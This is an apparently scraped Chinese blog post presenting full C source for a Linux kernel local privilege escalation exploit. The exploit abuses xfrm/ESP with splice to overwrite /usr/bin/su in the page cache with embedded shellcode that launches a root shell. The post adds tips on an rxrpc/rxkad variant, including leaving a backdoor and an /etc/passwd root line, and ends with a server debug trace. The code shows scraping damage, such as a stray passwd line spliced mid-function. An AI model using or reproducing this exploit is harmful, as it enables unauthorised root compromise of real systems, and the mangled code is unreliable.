当前位置:首页>Linux>no-CVE linux又现新提权漏洞, dirtyfrag xfrm/esp复现复盘, rxrpc/rxkad LPE有点翻车, 下次细聊

no-CVE linux又现新提权漏洞, dirtyfrag xfrm/esp复现复盘, rxrpc/rxkad LPE有点翻车, 下次细聊

  • 2026-06-27 11:47:14
no-CVE linux又现新提权漏洞, dirtyfrag xfrm/esp复现复盘, rxrpc/rxkad LPE有点翻车, 下次细聊
很长时间没好好看到能够直接用archlinux实机复现的漏洞了,这次主要涉及xfrm/esp和rxrpc/rxkad LPE两个模块的提权,先放源码:
#define _GNU_SOURCE#include<stdio.h>#include<stdlib.h>#include<string.h>#include<unistd.h>#include<fcntl.h>#include<errno.h>#include<sched.h>#include<sys/socket.h>#include<sys/uio.h>#include<sys/ioctl.h>#include<sys/wait.h>#include<netinet/in.h>#include<arpa/inet.h>#include<net/if.h>#include<linux/if.h>#include<linux/netlink.h>#include<linux/rtnetlink.h>#include<linux/xfrm.h>#ifndef UDP_ENCAP#define UDP_ENCAP 100#endif#ifndef UDP_ENCAP_ESPINUDP#define UDP_ENCAP_ESPINUDP 2#endif#ifndef SOL_UDP#define SOL_UDP 17#endif#define ENC_PORT         4500#define SEQ_VAL          200#define REPLAY_SEQ       100#define TARGET_PATH      "/usr/bin/su"#define PAYLOAD_LEN      192static const uint8_t shell_elf[PAYLOAD_LEN] = {        0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,        0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,        0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,        0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,        0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,        0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,        0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,        0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,        0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,        0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,        0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,        0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,};staticvoidwrite_proc(constchar *path, constchar *buf){        int fd = open(path, O_WRONLY);        if (fd >= 0) {                write(fd, buf, strlen(buf));                close(fd);        }}staticvoidsetup_userns_netns(void){        uid_t uid = getuid();        gid_t gid = getgid();        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {                perror("unshare");                exit(1);        }        write_proc("/proc/self/setgroups""deny");        char map[64];        snprintf(map, sizeof(map), "0 %u 1", uid);        write_proc("/proc/self/uid_map", map);        snprintf(map, sizeof(map), "0 %u 1", gid);        write_proc("/proc/self/gid_map", map);        int s = socket(AF_INET, SOCK_DGRAM, 0);        if (s >= 0) {                struct ifreq ifr = {0};                strcpy(ifr.ifr_name, "lo");                ioctl(s, SIOCGIFFLAGS, &ifr);                ifr.ifr_flags |= IFF_UP | IFF_RUNNING;                ioctl(s, SIOCSIFFLAGS, &ifr);         root:x:0:0:root:/root:/bin/bash       close(s);        }}staticintadd_xfrm_sa(uint32_t spi, uint32_t seqhi){        int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);        if (sk < 0return -1;        struct sockaddr_nl nl = { .nl_family = AF_NETLINK };        bind(sk, (struct sockaddr*)&nl, sizeof(nl));        char buf[4096] = {0};        struct nlmsghdr *nlh = (struct nlmsghdr *)buf;        nlh->nlmsg_type = XFRM_MSG_NEWSA;        nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;        nlh->nlmsg_pid = getpid();        nlh->nlmsg_seq = 1;        nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));        struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);        xs->id.daddr.a4 = inet_addr("127.0.0.1");        xs->id.spi = htonl(spi);        xs->id.proto = IPPROTO_ESP;        xs->saddr.a4 = inet_addr("127.0.0.1");        xs->family = AF_INET;        xs->mode = XFRM_MODE_TRANSPORT;        xs->replay_window = 0;        xs->reqid = 0x1234;        xs->flags = XFRM_STATE_ESN;        xs->lft.soft_byte_limit = xs->lft.hard_byte_limit = (uint64_t)-1;        xs->lft.soft_packet_limit = xs->lft.hard_packet_limit = (uint64_t)-1;        xs->sel.family = AF_INET;        xs->sel.prefixlen_d = xs->sel.prefixlen_s = 32;        xs->sel.daddr.a4 = xs->sel.saddr.a4 = inet_addr("127.0.0.1");        // Add XFRMA_ALG_AUTH_TRUNC        char auth_buf[sizeof(struct xfrm_algo_auth) + 32] = {0};        struct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)auth_buf;        strncpy(aa->alg_name, "hmac(sha256)"sizeof(aa->alg_name)-1);        aa->alg_key_len = 32 * 8;        aa->alg_trunc_len = 128;        memset(aa->alg_key, 0xAA32);        struct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));        rta->rta_type = XFRMA_ALG_AUTH_TRUNC;        rta->rta_len = RTA_LENGTH(sizeof(auth_buf));        memcpy(RTA_DATA(rta), auth_buf, sizeof(auth_buf));        nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);        // Add XFRMA_ALG_CRYPT        char crypt_buf[sizeof(struct xfrm_algo) + 16] = {0};        struct xfrm_algo *ea = (struct xfrm_algo *)crypt_buf;        strncpy(ea->alg_name, "cbc(aes)"sizeof(ea->alg_name)-1);        ea->alg_key_len = 16 * 8;        memset(ea->alg_key, 0xBB16);        rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));        rta->rta_type = XFRMA_ALG_CRYPT;        rta->rta_len = RTA_LENGTH(sizeof(crypt_buf));        memcpy(RTA_DATA(rta), crypt_buf, sizeof(crypt_buf));        nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);        // Add XFRMA_ENCAP        struct xfrm_encap_tmpl enc = {                .encap_type = UDP_ENCAP_ESPINUDP,                .encap_sport = htons(ENC_PORT),                .encap_dport = htons(ENC_PORT)        };        rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));        rta->rta_type = XFRMA_ENCAP;        rta->rta_len = RTA_LENGTH(sizeof(enc));        memcpy(RTA_DATA(rta), &enc, sizeof(enc));        nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);        // Add XFRMA_REPLAY_ESN_VAL        char esn_buf[sizeof(struct xfrm_replay_state_esn) + 4] = {0};        struct xfrm_replay_state_esn *esn = (struct xfrm_replay_state_esn *)esn_buf;        esn->bmp_len = 1;        esn->seq = REPLAY_SEQ;        esn->seq_hi = seqhi;        esn->replay_window = 32;        rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));        rta->rta_type = XFRMA_REPLAY_ESN_VAL;        rta->rta_len = RTA_LENGTH(sizeof(esn_buf));        memcpy(RTA_DATA(rta), esn_buf, sizeof(esn_buf));        nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);        send(sk, nlh, nlh->nlmsg_len, 0);        char rbuf[4096];        recv(sk, rbuf, sizeof(rbuf), 0);        close(sk);        return 0;}staticintdo_one_write(constchar *path, off_t offset, uint32_t spi){        int sk_recv = socket(AF_INET, SOCK_DGRAM, 0);        if (sk_recv < 0return -1;        int one = 1;        setsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));        struct sockaddr_in sa_d = {                .sin_family = AF_INET,                .sin_port = htons(ENC_PORT),                .sin_addr = { inet_addr("127.0.0.1") },        };        bind(sk_recv, (struct sockaddr*)&sa_d, sizeof(sa_d));        int encap = UDP_ENCAP_ESPINUDP;        if (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {                perror("setsockopt UDP_ENCAP");                close(sk_recv);                return -1;        }        int sk_send = socket(AF_INET, SOCK_DGRAM, 0);        if (sk_send < 0) { close(sk_recv); return -1; }        connect(sk_send, (struct sockaddr*)&sa_d, sizeof(sa_d));        int file_fd = open(path, O_RDONLY);        if (file_fd < 0) { close(sk_send); close(sk_recv); return -1; }        int pfd[2];        if (pipe(pfd) < 0) {                close(file_fd); close(sk_send); close(sk_recv);                return -1;        }        uint8_t hdr[24];        *(uint32_t*)hdr = htonl(spi);        *(uint32_t*)(hdr + 4) = htonl(SEQ_VAL);        memset(hdr + 80xCC16);        struct iovec iov_h = { .iov_base = hdr, .iov_len = sizeof(hdr) };        if (vmsplice(pfd[1], &iov_h, 10) != sizeof(hdr)) {                close(file_fd); close(pfd[0]); close(pfd[1]);                close(sk_send); close(sk_recv);                return -1;        }        off_t off = offset;        splice(file_fd, &off, pfd[1], NULL16, SPLICE_F_MOVE);        splice(pfd[0], NULL, sk_send, NULL24 + 16, SPLICE_F_MOVE);        usleep(150 * 1000);        close(file_fd); close(pfd[0]); close(pfd[1]);        close(sk_send); close(sk_recv);        return 0;}intmain(void){        printf("[*] Setting up user namespace...\n");        setup_userns_netns();        usleep(100 * 1000);        printf("[*] Installing %d XFRM SAs...\n", PAYLOAD_LEN / 4);        for (int i = 0; i < PAYLOAD_LEN / 4; i++) {                uint32_t spi = 0xDEADBE10 + i;                uint32_t seqhi = ((uint32_t)shell_elf[i*4] << 24) |                                ((uint32_t)shell_elf[i*4+1] << 16) |                                ((uint32_t)shell_elf[i*4+2] << 8) |                                shell_elf[i*4+3];                if (add_xfrm_sa(spi, seqhi) < 0) {                        printf("[-] Failed to add SA #%d\n", i);                        return 1;                }        }        printf("[*] Writing payload to %s...\n", TARGET_PATH);        for (int i = 0; i < PAYLOAD_LEN / 4; i++) {                uint32_t spi = 0xDEADBE10 + i;                if (do_one_write(TARGET_PATH, i * 4, spi) < 0) {                        printf("[-] Write #%d failed\n", i);                        return 1;                }        }        printf("[+] Success! Executing patched su...\n");        execl(TARGET_PATH, TARGET_PATH, NULL);        perror("execl");        return 1;}
xfrm/esp与CVE-2026-31431 copy fail使用起来相似度较高一些:

CVE-2026-31431 程序复现

sudopacman,公众号:Sakana网络安全CVE-2026-31431 copy fail内核漏洞环境搭建全记录
完成后推荐及时以root用户直接删除缓存, 避免多余的su root登陆:
echo 3 > /proc/sys/vm/drop_caches

rxrpc/rxkad LPE比较麻烦,路经是计算/etc/passwd配置文件的偏移,比较吃系统配置,修改原理是尝试将密码的shadow映射去掉,改成自己的密码,但是不同系统偏移好像不太一样,如果错误的话su root就不可用了,使用前记得给自己留个后门,实在不行xfrm/esp提权回root改/etc/passwd配置文件. 这里留个/etc/passwd配置文件通用的root配置:
root:x:0:0:root:/root:/usr/bin/bash

最新文章

随机文章

基本 文件 流程 错误 SQL 调试
  1. 请求信息 : 2026-07-03 17:57:53 HTTP/2.0 GET : https://f.mffb.com.cn/a/492232.html
  2. 运行时间 : 0.145155s [ 吞吐率:6.89req/s ] 内存消耗:4,673.63kb 文件加载:140
  3. 缓存信息 : 0 reads,0 writes
  4. 会话信息 : SESSION_ID=4ba2761adf47eca2d95357afedfb4014
  1. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/public/index.php ( 0.79 KB )
  2. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/autoload.php ( 0.17 KB )
  3. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_real.php ( 2.49 KB )
  4. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/platform_check.php ( 0.90 KB )
  5. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/ClassLoader.php ( 14.03 KB )
  6. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_static.php ( 4.90 KB )
  7. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper.php ( 8.34 KB )
  8. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/helper.php ( 2.19 KB )
  9. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/helper.php ( 1.47 KB )
  10. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/stubs/load_stubs.php ( 0.16 KB )
  11. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Exception.php ( 1.69 KB )
  12. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Facade.php ( 2.71 KB )
  13. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/deprecation-contracts/function.php ( 0.99 KB )
  14. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap.php ( 8.26 KB )
  15. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap80.php ( 9.78 KB )
  16. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/Resources/functions/dump.php ( 1.49 KB )
  17. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-dumper/src/helper.php ( 0.18 KB )
  18. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/VarDumper.php ( 4.30 KB )
  19. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/App.php ( 15.30 KB )
  20. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Container.php ( 15.76 KB )
  21. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/container/src/ContainerInterface.php ( 1.02 KB )
  22. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/provider.php ( 0.19 KB )
  23. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Http.php ( 6.04 KB )
  24. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Str.php ( 7.29 KB )
  25. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Env.php ( 4.68 KB )
  26. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/common.php ( 0.03 KB )
  27. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/helper.php ( 18.78 KB )
  28. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Config.php ( 5.54 KB )
  29. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/app.php ( 0.95 KB )
  30. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cache.php ( 0.78 KB )
  31. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/console.php ( 0.23 KB )
  32. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cookie.php ( 0.56 KB )
  33. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/database.php ( 2.48 KB )
  34. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Env.php ( 1.67 KB )
  35. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/filesystem.php ( 0.61 KB )
  36. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/lang.php ( 0.91 KB )
  37. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/log.php ( 1.35 KB )
  38. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/middleware.php ( 0.19 KB )
  39. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/route.php ( 1.89 KB )
  40. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/session.php ( 0.57 KB )
  41. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/trace.php ( 0.34 KB )
  42. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/view.php ( 0.82 KB )
  43. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/event.php ( 0.25 KB )
  44. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Event.php ( 7.67 KB )
  45. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/service.php ( 0.13 KB )
  46. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/AppService.php ( 0.26 KB )
  47. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Service.php ( 1.64 KB )
  48. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Lang.php ( 7.35 KB )
  49. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/lang/zh-cn.php ( 13.70 KB )
  50. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/Error.php ( 3.31 KB )
  51. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/RegisterService.php ( 1.33 KB )
  52. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/services.php ( 0.14 KB )
  53. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/PaginatorService.php ( 1.52 KB )
  54. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ValidateService.php ( 0.99 KB )
  55. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ModelService.php ( 2.04 KB )
  56. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Service.php ( 0.77 KB )
  57. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Middleware.php ( 6.72 KB )
  58. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/BootService.php ( 0.77 KB )
  59. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Paginator.php ( 11.86 KB )
  60. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/Validate.php ( 63.20 KB )
  61. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Model.php ( 23.55 KB )
  62. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Attribute.php ( 21.05 KB )
  63. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/AutoWriteData.php ( 4.21 KB )
  64. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Conversion.php ( 6.44 KB )
  65. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/DbConnect.php ( 5.16 KB )
  66. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/ModelEvent.php ( 2.33 KB )
  67. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/RelationShip.php ( 28.29 KB )
  68. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Arrayable.php ( 0.09 KB )
  69. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Jsonable.php ( 0.13 KB )
  70. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/contract/Modelable.php ( 0.09 KB )
  71. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Db.php ( 2.88 KB )
  72. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/DbManager.php ( 8.52 KB )
  73. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Log.php ( 6.28 KB )
  74. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Manager.php ( 3.92 KB )
  75. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerTrait.php ( 2.69 KB )
  76. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerInterface.php ( 2.71 KB )
  77. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cache.php ( 4.92 KB )
  78. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/simple-cache/src/CacheInterface.php ( 4.71 KB )
  79. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Arr.php ( 16.63 KB )
  80. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/driver/File.php ( 7.84 KB )
  81. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/Driver.php ( 9.03 KB )
  82. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/CacheHandlerInterface.php ( 1.99 KB )
  83. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/Request.php ( 0.09 KB )
  84. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Request.php ( 55.78 KB )
  85. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/middleware.php ( 0.25 KB )
  86. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Pipeline.php ( 2.61 KB )
  87. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/TraceDebug.php ( 3.40 KB )
  88. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/middleware/SessionInit.php ( 1.94 KB )
  89. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Session.php ( 1.80 KB )
  90. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/driver/File.php ( 6.27 KB )
  91. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/SessionHandlerInterface.php ( 0.87 KB )
  92. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/Store.php ( 7.12 KB )
  93. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Route.php ( 23.73 KB )
  94. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleName.php ( 5.75 KB )
  95. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Domain.php ( 2.53 KB )
  96. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleGroup.php ( 22.43 KB )
  97. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Rule.php ( 26.95 KB )
  98. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleItem.php ( 9.78 KB )
  99. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/route/app.php ( 1.72 KB )
  100. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Route.php ( 4.70 KB )
  101. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/dispatch/Controller.php ( 4.74 KB )
  102. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Dispatch.php ( 10.44 KB )
  103. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/controller/Index.php ( 4.81 KB )
  104. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/BaseController.php ( 2.05 KB )
  105. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/facade/Db.php ( 0.93 KB )
  106. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/connector/Mysql.php ( 5.44 KB )
  107. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/PDOConnection.php ( 52.47 KB )
  108. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Connection.php ( 8.39 KB )
  109. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/ConnectionInterface.php ( 4.57 KB )
  110. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/builder/Mysql.php ( 16.58 KB )
  111. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Builder.php ( 24.06 KB )
  112. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseBuilder.php ( 27.50 KB )
  113. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Query.php ( 15.71 KB )
  114. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseQuery.php ( 45.13 KB )
  115. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TimeFieldQuery.php ( 7.43 KB )
  116. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/AggregateQuery.php ( 3.26 KB )
  117. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ModelRelationQuery.php ( 20.07 KB )
  118. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ParamsBind.php ( 3.66 KB )
  119. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ResultOperation.php ( 7.01 KB )
  120. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/WhereQuery.php ( 19.37 KB )
  121. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/JoinAndViewQuery.php ( 7.11 KB )
  122. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TableFieldInfo.php ( 2.63 KB )
  123. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/Transaction.php ( 2.77 KB )
  124. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/driver/File.php ( 5.96 KB )
  125. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/LogHandlerInterface.php ( 0.86 KB )
  126. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/Channel.php ( 3.89 KB )
  127. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/event/LogRecord.php ( 1.02 KB )
  128. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/Collection.php ( 16.47 KB )
  129. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/View.php ( 1.70 KB )
  130. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/View.php ( 4.39 KB )
  131. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Response.php ( 8.81 KB )
  132. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/response/View.php ( 3.29 KB )
  133. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cookie.php ( 6.06 KB )
  134. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-view/src/Think.php ( 8.38 KB )
  135. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/TemplateHandlerInterface.php ( 1.60 KB )
  136. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/Template.php ( 46.61 KB )
  137. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/driver/File.php ( 2.41 KB )
  138. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/contract/DriverInterface.php ( 0.86 KB )
